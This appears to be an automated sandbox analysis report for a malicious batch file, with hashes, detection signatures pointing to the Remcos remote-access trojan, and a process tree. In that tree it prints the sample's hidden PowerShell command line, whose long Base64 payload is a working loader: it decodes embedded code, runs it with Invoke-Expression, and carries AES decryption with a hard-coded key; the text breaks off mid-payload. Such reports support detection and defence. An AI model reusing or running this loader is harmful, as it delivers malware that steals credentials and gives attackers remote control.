Edit tour
Windows
Analysis Report
z1PO20254540.bat
Overview
General Information
| Sample name: | z1PO20254540.bat |
| Analysis ID: | 1630589 |
| MD5: | 7d61bec36fd99bd1181d4fe2320c1e0a |
| SHA1: | b3514cc47015858f3d7905d2a6172a2d779bea33 |
| SHA256: | c7e0a02c45ab0cffc987802eab5ce06eb737a405cac1302b98d72d9ebf50d1bb |
| Tags: | batuser-Porcupine |
| Infos: |   |
 | |
Detection
Batch Injector, Remcos
| Score: | 100 |
| Range: | 0 - 100 |
| Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected Batch Injector
Yara detected Powershell decode and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains a sample name check
.NET source code references suspicious native API functions
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Joe Sandbox ML detected suspicious sample
Maps a DLL or memory area into another process
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Malicious Base64 Encoded PowerShell Keywords in Command Lines
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Writes to foreign memory regions
Yara detected WebBrowserPassView password recovery tool
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Too many similar processes found
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w10x64
cmd.exe (PID: 3132 cmdline: C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\z1PO2 0254540.ba t" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2300 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 3740 cmdline:
C:\Windows \system32\ cmd.exe /K "C:\Users \user\Desk top\z1PO20 254540.bat " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2520 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) 
powershell.exe (PID: 4144 cmdline: "C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" -noprofile -windowst yle hidden -ep bypas s -Command "[Text.En coding]::U TF8.GetStr ing([Conve rt]::FromB ase64Strin g('JHVzZXJ OYW1lID0gJ GVudjpVU0V STkFNRTske WdyanogPSA iQzpcVXNlc nNcJHVzZXJ OYW1lXGR3b S5iYXQiO2l mIChUZXN0L VBhdGggJHl ncmp6KSB7I CAgIFdyaXR lLUhvc3QgI kJhdGNoIGZ pbGUgZm91b mQ6ICR5Z3J qeiIgLUZvc mVncm91bmR Db2xvciBDe WFuOyAgICA kZmlsZUxpb mVzID0gW1N 5c3RlbS5JT y5GaWxlXTo 6UmVhZEFsb ExpbmVzKCR 5Z3JqeiwgW 1N5c3RlbS5 UZXh0LkVuY 29kaW5nXTo 6VVRGOCk7I CAgIGZvcmV hY2ggKCRsa W5lIGluICR maWxlTGluZ XMpIHsgICA gICAgIGlmI CgkbGluZSA tbWF0Y2ggJ 146OjogPyg uKykkJykge yAgICAgICA gICAgIFdya XRlLUhvc3Q gIkluamVjd GlvbiBjb2R lIGRldGVjd GVkIGluIHR oZSBiYXRja CBmaWxlLiI gLUZvcmVnc m91bmRDb2x vciBDeWFuO yAgICAgICA gICAgIHRye SB7ICAgICA gICAgICAgI CAgICRkZWN vZGVkQnl0Z XMgPSBbU3l zdGVtLkNvb nZlcnRdOjp Gcm9tQmFzZ TY0U3RyaW5 nKCRtYXRja GVzWzFdLlR yaW0oKSk7I CAgICAgICA gICAgICAgI CRpbmplY3R pb25Db2RlI D0gW1N5c3R lbS5UZXh0L kVuY29kaW5 nXTo6VW5pY 29kZS5HZXR TdHJpbmcoJ GRlY29kZWR CeXRlcyk7I CAgICAgICA gICAgICAgI FdyaXRlLUh vc3QgIklua mVjdGlvbiB jb2RlIGRlY 29kZWQgc3V jY2Vzc2Z1b Gx5LiIgLUZ vcmVncm91b mRDb2xvciB HcmVlbjsgI CAgICAgICA gICAgICAgV 3JpdGUtSG9 zdCAiRXhlY 3V0aW5nIGl uamVjdGlvb iBjb2RlLi4 uIiAtRm9yZ Wdyb3VuZEN vbG9yIFllb GxvdzsgICA gICAgICAgI CAgICAgSW5 2b2tlLUV4c HJlc3Npb24 gJGluamVjd GlvbkNvZGU 7ICAgICAgI CAgICAgICA gIGJyZWFrO yAgICAgICA gICAgIH0gY 2F0Y2ggeyA gICAgICAgI CAgICAgICB Xcml0ZS1Ib 3N0ICJFcnJ vciBkdXJpb mcgZGVjb2R pbmcgb3IgZ XhlY3V0aW5 nIGluamVjd GlvbiBjb2R lOiAkXyIgL UZvcmVncm9 1bmRDb2xvc iBSZWQ7ICA gICAgICAgI CAgfTsgICA gICAgIH07I CAgIH07fSB lbHNlIHsgI CAgICBXcml 0ZS1Ib3N0I CJTeXN0ZW0 gRXJyb3I6I EJhdGNoIGZ pbGUgbm90I GZvdW5kOiA keWdyanoiI C1Gb3JlZ3J vdW5kQ29sb 3IgUmVkOyA gICBleGl0O 307ZnVuY3R pb24gcHJ4a mYoJHBhcmF tX3Zhcil7C SRhZXNfdmF yPVtTeXN0Z W0uU2VjdXJ pdHkuQ3J5c HRvZ3JhcGh 5LkFlc106O kNyZWF0ZSg pOwkkYWVzX 3Zhci5Nb2R lPVtTeXN0Z W0uU2VjdXJ pdHkuQ3J5c HRvZ3JhcGh 5LkNpcGhlc k1vZGVdOjp DQkM7CSRhZ XNfdmFyLlB hZGRpbmc9W 1N5c3RlbS5 TZWN1cml0e S5DcnlwdG9 ncmFwaHkuU GFkZGluZ01 vZGVdOjpQS 0NTNzsJJGF lc192YXIuS 2V5PVtTeXN 0ZW0uQ29ud mVydF06OkZ yb21CYXNlN jRTdHJpbmc oJ1ZwM0Vzb 01tRjVvc1l DUkxyQWc2Z 2phYlZtaHI 3RXFickRzN nZ6RHZQdDQ 9Jyk7CSRhZ XNfdmFyLkl WPVtTeXN0Z W0uQ29udmV ydF06OkZyb 21CYXNlNjR TdHJpbmcoJ 0VnTGhJcFc vUGtqYlJJT HR0ZmJ5aHc 9PScpOwkkZ GVjcnlwdG9 yX3Zhcj0kY WVzX3Zhci5 DcmVhdGVEZ WNyeXB0b3I oKTsJJHJld HVybl92YXI 9JGRlY3J5c HRvcl92YXI uVHJhbnNmb 3JtRmluYWx CbG9jaygkc GFyYW1fdmF yLCAwLCAkc GFyYW1fdmF yLkxlbmd0a Ck7CSRkZWN yeXB0b3Jfd mFyLkRpc3B vc2UoKTsJJ GFlc192YXI uRGlzcG9zZ SgpOwkkcmV 0dXJuX3Zhc jt9ZnVuY3R pb24genNqY 3MoJHBhcmF tX3Zhcil7C SRwcXFucj1 OZXctT2JqZ